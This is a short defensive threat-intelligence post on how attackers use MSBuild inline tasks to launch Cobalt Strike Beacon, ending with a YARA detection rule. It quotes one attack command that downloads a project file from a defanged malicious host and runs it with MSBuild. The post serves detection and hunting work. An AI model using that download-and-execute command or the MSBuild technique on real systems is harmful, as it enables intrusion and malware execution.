[ << ALL_FEED ]

Cobalt Strike Beacon and MSBuild

More in General

🥷 Cobalt Strike Beacon and MSBuild

The practice of our incident investigations shows that threat actors are still using the Microsoft Build Engine to compile .NET and launch Cobalt Strike Beacon on compromised hosts.

First, a .NET project configuration in XML format is uploaded to the host. The configuration contains an inline task.

The task code is described in the following structure:


<Task> <Code Type="Fragment" Language="cs"> <![CDATA[...]]> </Code> </Task>

A task is a block of executable code with which MSBuild performs atomic operations that developers use during the project build process. In the case under consideration, the threat actors use this mechanism to launch malware.

After the configuration is successfully uploaded, MSBuild is launched with the path to the project configuration specified as a parameter. As a result, a .NET library is compiled and executed on the compromised host. It decrypts the payload and calls the EnumChildWindows function, which executes the shellcode.

Launch example:


wget https://maliciouswebsite[.]com/doWqkwoown/update.csproj -O C:\Windows\Temp\update.csproj; C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\update.csproj

Yara:


rule Susp_Microsoft_Build_Engine_XML_Schema {
  strings:
    $s1 = "TaskFactory=\"CodeTaskFactory" 
    $s2 = "VirtualAllocEx(0xFFFFFFFF, 0, (UInt32)"
    $e1 = "EnumChildWindows" 
    $e2 = "EnumDisplayMonitors" 
  condition:
    all of ($s*) and any of ($e*)
}

Additional materials 👈

#dfir #hunt #detect #yara #win
@ptescalator

More from oUth0R

More from oUth0R

More in General